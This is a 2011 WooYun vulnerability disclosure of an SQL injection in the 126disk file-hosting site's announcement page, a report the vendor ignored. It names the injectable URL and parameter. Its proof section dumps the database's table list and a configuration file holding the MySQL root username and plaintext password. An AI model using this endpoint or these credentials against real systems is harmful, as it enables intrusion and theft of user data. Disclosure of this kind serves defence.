漏洞概要 关注数(24) 关注此漏洞
缺陷编号:wooyun-2011-02979
漏洞标题:126网盘猪肉
相关厂商:网易
漏洞作者: 我了个去
提交时间:2011-10-11 23:00
修复时间:2011-10-16 23:00
公开时间:2011-10-16 23:00
漏洞类型:SQL注射漏洞
危害等级:低
自评Rank:1
漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞
漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]
Tags标签: 无
漏洞详情
披露状态:
2011-10-11: 细节已通知厂商并且等待厂商处理中
2011-10-16: 厂商已经主动忽略漏洞,细节向公众公开
简要描述:
公告处的一个猪肉,大家都懂得
详细说明:
http://www.126disk.com/gonggao.php?id=4
root权限,400disk库也可查看,也可以load file读任意文件,比如数据库配置文件
http://www.126disk.com/gonggao.php?id=-4 可以爆路径的 其实用google site 一下就可以发现很多warning ,不知有多少人在脱了吧?
漏洞证明:
inject:
Database: 126disk
[24 tables]
+------------------+
| disk_admin |
| disk_adminlog |
| disk_adminmsg |
| disk_collection |
| disk_count |
| disk_file |
| disk_gonggao |
| disk_guolv |
| disk_haoyou |
| disk_integral |
| disk_integrallog |
| disk_jubao |
| disk_link |
| disk_links |
| disk_message |
| disk_mulu |
| disk_search |
| disk_server |
| disk_tag |
| disk_type |
| disk_user |
| disk_userlog |
| disk_visitors |
| disk_zhuanji |
+------------------+
400disk跟126disk库结构基本一样吧,貌似就用户数量不一样
load file: class.php
$mysql_host = "localhost";
$mysql_user = "root";// 连接数据库用户名
$mysql_pass = "mysql.123!@#~";// 连接数据库密码
$mysql_data = "126disk";// 数据库的名字
$mysql_charset = "gbk";
修复方案:
你懂的
版权声明:转载请注明来源 我了个去@乌云
漏洞回应
厂商回应:
危害等级:无影响厂商忽略
忽略时间:2011-10-16 23:00
厂商回复:
漏洞Rank:15 (WooYun评价)
最新状态:
暂无